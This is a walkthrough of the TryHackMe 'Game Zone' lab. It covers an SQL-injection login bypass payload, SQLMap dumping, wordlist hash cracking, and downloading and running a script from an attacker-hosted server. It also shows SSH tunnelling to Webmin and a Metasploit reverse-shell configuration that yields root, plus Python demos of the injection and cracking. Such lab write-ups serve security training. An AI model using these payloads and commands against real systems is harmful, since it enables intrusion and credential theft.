Game Zone - SQLi and Reverse SSH Tunneling
A TryHackMe box combining SQL injection, password cracking, reverse SSH tunneling, and Metasploit exploitation.
Game Zone | Linux
Difficulty: Medium
Tags: SQLi, hash cracking, tunneling, Webmin, privesc
Tools Used: Nmap, Gobuster, Burp Suite, SQLMap, John the Ripper, LinPEAS, SSH, Metasploit
Game Zone isn’t just another web-to-root machine. It’s a blueprint for the kind of layered exploitation that dominates real-world engagements: weak login logic, password reuse, local services hiding behind SSH, and a final pop through Metasploit. This is a full-stack test of your OSCP fundamentals. 🧠
Initial Enumeration
Started with an aggressive scan to surface all useful detail:
nmap -sC -sV -A 10.10.238.97
Scan results came back with:
Port 22 – SSH
Port 80 – HTTP (Apache)
A web server means we probe further. Unleashed Gobuster to map the HTTP terrain:
gobuster dir --url http://10.10.238.97 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Found /index, a login page.
Exploiting SQL Injection
Tested a classic authentication-bypass payload in the login form:
Username: admin' OR 1=1 -- -
Password: anything
The single quote closes the username string, OR 1=1 makes the WHERE clause true for every row, and -- - comments out the password check (MySQL only treats -- as a comment when whitespace follows it, which is why the trailing dash is there to keep that space from being trimmed). The login succeeded and dropped us on /portal.php, confirming the injection. Captured a raw request to /portal.php with Burp Suite, saved it as web_req.txt, and handed it to SQLMap:
sqlmap -r web_req.txt --dbms=mysql --dump
-r replays the captured request (cookies and POST body included), --dbms skips backend fingerprinting, and --dump pulls every table SQLMap can read. Among them was a users table with a password hash.
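To make the bypass concrete, here is an added example (not code from the box or the TryHackMe room) that reproduces the vulnerable login against an in-memory SQLite table and shows the hardened form beside it. The table, the username agent and the password s3cretpass are constructed stand-ins, and the page's MySQL backend is swapped for sqlite3 so the example runs offline; the -- comment behaves the same way in both engines.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed stand-in for the portal's users table; the row is made up, not dumped data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("agent", hashlib.sha256(b"s3cretpass").hexdigest()))
    db.commit()
    return db


def build_vulnerable_query(username, password):
    """The bug: user input is spliced into the SQL text, so a quote and a comment rewrite the grammar."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND pwd = '{pwd_hash}'")


def login_vulnerable(db, username, password):
    """Login as the box does it: returns the matched username, or None on failure."""
    row = db.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Hardened form: bound parameters stay data no matter which characters they contain."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    row = db.execute("SELECT username FROM users WHERE username = ? AND pwd = ?",
                     (username, pwd_hash)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR 1=1 -- -"
    print(build_vulnerable_query(payload, "anything"))
    print(login_vulnerable(db, payload, "anything"))  # first row wins: agent
    print(login_safe(db, payload, "anything"))        # None
```

With the payload in place the vulnerable query reads `... WHERE username = 'admin' OR 1=1 -- -' AND pwd = '...'`; everything after `--` is a comment, so the password never gets compared and the first row in the table is returned. The parameterised version sends the same string as a bound value and finds no such user.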
Cracking the Credentials
Used hashid to identify the hash type, then cracked it with John the Ripper, passing the format hashid reported:
john crackme --wordlist=/usr/share/wordlists/rockyou.txt --format=<hash_format>
Result: a cleartext password, which the same user had reused for SSH.
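The cracking step is worth seeing in miniature. The following is an added example, not the page's own tooling: it guesses the John format from the digest length the way hashid does, then runs a wordlist attack with a couple of John-style mangling rules. The five-word list stands in for rockyou.txt and the target digest is the SHA-256 of a made-up password, gamezone99; neither comes from the box.

```python
import hashlib

# Constructed sample: a toy wordlist standing in for rockyou.txt and the hex digest
# of a weak, made-up password. Neither value is taken from the box.
WORDLIST = ["password", "letmein", "qwerty", "gamezone", "agent"]
TARGET_HASH = hashlib.sha256(b"gamezone99").hexdigest()

# hashid-style guess from digest length; only unsalted hex digests are covered here.
RAW_FORMATS = {32: "raw-md5", 40: "raw-sha1", 64: "raw-sha256", 128: "raw-sha512"}
HASHLIB_NAME = {"raw-md5": "md5", "raw-sha1": "sha1",
                "raw-sha256": "sha256", "raw-sha512": "sha512"}


def guess_format(digest):
    """Return the John --format name implied by an unsalted hex digest, or None if unsure."""
    digest = digest.strip().lower()
    if not digest or any(c not in "0123456789abcdef" for c in digest):
        return None
    return RAW_FORMATS.get(len(digest))


def mangle(word):
    """A few John-style rules: the word as-is, capitalised, and each with 0-99 appended."""
    bases = [word, word.capitalize()]
    for base in bases:
        yield base
    for base in bases:
        for n in range(100):
            yield f"{base}{n}"


def crack(digest, wordlist):
    """Wordlist attack. Returns (plaintext, guesses_tried); plaintext is None on a miss."""
    fmt = guess_format(digest)
    if fmt is None:
        return None, 0
    algo = HASHLIB_NAME[fmt]
    digest = digest.strip().lower()
    tried = 0
    for word in wordlist:
        for candidate in mangle(word):
            tried += 1
            if hashlib.new(algo, candidate.encode()).hexdigest() == digest:
                return candidate, tried
    return None, tried


if __name__ == "__main__":
    print(guess_format(TARGET_HASH))      # raw-sha256
    print(crack(TARGET_HASH, WORDLIST))   # ('gamezone99', 708)
```

Each guess costs one hash computation, which is why an unsalted fast digest falls to rockyou.txt in seconds; a salted, deliberately slow KDF such as bcrypt or scrypt would need the same wordlist but orders of magnitude more work per guess, and the salt would stop a single run from covering every user at once.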
SSH login:
ssh user@10.10.238.97
Popped the user flag:
cat user.txt
Privilege Escalation with LinPEAS
Time to go deeper.
Served linpeas.sh from the attacker box and pulled it onto the target:
python3 -m http.server 5555 # attacker box
wget http://<attacker-ip>:5555/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinPEAS flagged something interesting in its network section: a TCP service listening only on 127.0.0.1:10000, which is why the initial Nmap scan never saw it. The same finding shows up by hand with ss -tulpn or netstat -tulpn.
Pivoting with SSH Tunneling
To reach the internal service, we forwarded it over SSH:
ssh -L 10000:127.0.0.1:10000 user@10.10.238.97
The -L argument reads local_port:destination:destination_port. SSH listens on port 10000 of the attacker box and relays every connection through the session to 127.0.0.1:10000 as seen from the target. If port 10000 is already taken locally, pick another local port; only the first number changes.
Browsed to http://127.0.0.1:10000 and got a Webmin login page.
Tried the previously cracked credentials. They worked. We were in.
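The LinPEAS finding and the tunnel above are two halves of one routine: spot sockets bound only to loopback, then forward each one. The following added example (not from the page or from LinPEAS) parses a constructed ss -tulpn listing, reports the loopback-only ports with the process behind each, and assembles the matching ssh -L command. The sample output, its PIDs and process names are made up; the webmin and mysqld entries are there to show that more than one port may be worth forwarding.

```python
import re

# Constructed sample of `ss -tulpn` output on a target; PIDs and process names are made up.
SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53   0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=1113,fd=3))
tcp   LISTEN 0      128    127.0.0.1:10000    0.0.0.0:*         users:(("perl",pid=1186,fd=5))
tcp   LISTEN 0      80     127.0.0.1:3306     0.0.0.0:*         users:(("mysqld",pid=1200,fd=20))
tcp   LISTEN 0      128    *:80               *:*               users:(("apache2",pid=1300,fd=4))
tcp   LISTEN 0      128    [::]:22            [::]:*            users:(("sshd",pid=1113,fd=4))
"""

LOOPBACK_PREFIXES = ("127.", "::1")
WILDCARD_ADDRS = {"0.0.0.0", "*", "::"}


def parse_listeners(text):
    """Return (proto, addr, port, process) for each listening socket in ss -tulpn output."""
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] not in ("tcp", "udp"):
            continue  # header line or something we do not understand
        proto, state, local = parts[0], parts[1], parts[4]
        if proto == "tcp" and state != "LISTEN":
            continue
        addr, _, port = local.rpartition(":")
        addr = addr.strip("[]").split("%")[0]  # drop IPv6 brackets and the %iface suffix
        match = re.search(r'\(\("([^"]+)"', line)
        listeners.append((proto, addr, int(port), match.group(1) if match else ""))
    return listeners


def loopback_only(listeners):
    """Ports reachable only from the box itself: bound to 127.x/::1 and not also on a wildcard."""
    wildcard = {(proto, port) for proto, addr, port, _ in listeners if addr in WILDCARD_ADDRS}
    return sorted({(proto, port, proc) for proto, addr, port, proc in listeners
                   if addr.startswith(LOOPBACK_PREFIXES) and (proto, port) not in wildcard})


def forward_spec(port, local_port=None):
    """Build one -L argument; the local port defaults to the remote one."""
    return f"-L {local_port or port}:127.0.0.1:{port}"


def tunnel_command(user, host, listeners):
    """ssh command forwarding every loopback-only TCP port (ssh -L carries TCP, not UDP)."""
    specs = [forward_spec(port) for proto, port, _ in loopback_only(listeners) if proto == "tcp"]
    return "ssh " + " ".join(specs) + f" {user}@{host}"


if __name__ == "__main__":
    found = parse_listeners(SS_OUTPUT)
    for proto, port, proc in loopback_only(found):
        print(f"{proto}/{port} ({proc or 'unknown'}) is loopback-only")
    print(tunnel_command("user", "10.10.238.97", found))
```

Run against the sample it prints the two hidden TCP services and the DNS stub resolver, then `ssh -L 3306:127.0.0.1:3306 -L 10000:127.0.0.1:10000 user@10.10.238.97`; the UDP entry is listed but not forwarded, since -L only carries TCP.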
Webmin Exploitation with Metasploit
Verified the Webmin version from the UI — 1.580. Looked up known vulns:
searchsploit webmin 1.580
Found:
Webmin 1.580 - '/file/show.cgi' Remote Command Execution
Loaded the matching Metasploit module. It is an authenticated exploit, so the Webmin credentials go into USERNAME and PASSWORD:
msfconsole
search webmin_show_cgi_exec
use exploit/unix/webapp/webmin_show_cgi_exec
Config:
set RHOSTS 127.0.0.1
set RPORT 10000
set USERNAME user
set PASSWORD password
set SSL false
set PAYLOAD cmd/unix/reverse
set LHOST tun1
set LPORT 4444
run
Two things to get right here. RHOSTS is 127.0.0.1 because the exploit request travels through the local forward, but the reverse shell is opened by the target, so LHOST must be the attacker's address on the VPN interface (tun1 here), never loopback. And the Webmin UI was reached over plain HTTP through the tunnel, hence SSL false.
Callback hit. Webmin runs as root, so the shell it spawns is root too.
whoami
root
cat /root/root.txt
Summary / Review
Game Zone teaches exploitation chaining at its best:
Initial Access:
SQLi in login ➤ dumped password hash
Cracked hash ➤ SSH creds
SSH login ➤ user flag
Privilege Escalation Path:
linpeas ➤ exposed localhost Webmin
SSH tunneling ➤ Webmin access
Metasploit RCE ➤ root shell
It’s a reminder that:
Hashes in the wild are almost always worth cracking
Exposed services inside the box can be just as dangerous as external ones 🛡️
Reused credentials are a weapon
Tunneling isn’t just a CTF trick, it’s everyday pivoting on real engagements 💣
Command Recap
nmap -sC -sV -A 10.10.238.97
gobuster dir --url http://10.10.238.97 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
sqlmap -r web_req.txt --dbms=mysql --dump
john crackme --wordlist=/usr/share/wordlists/rockyou.txt --format=<hash_format>
ssh user@10.10.238.97
python3 -m http.server 5555
wget http://<attacker-ip>:5555/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh
ssh -L 10000:127.0.0.1:10000 user@10.10.238.97
msfconsole
use exploit/unix/webapp/webmin_show_cgi_exec
set RHOSTS 127.0.0.1
set RPORT 10000
set USERNAME user
set PASSWORD password
set SSL false
set PAYLOAD cmd/unix/reverse
set LHOST tun1
set LPORT 4444
run
Final Thoughts
Weak auth logic. Reused creds. Exposed internal tools.
Game Zone rewards methodical attackers who know how to connect the dots.
Crack the hash, open the tunnel, light the shell.
Another one rooted. On to the next.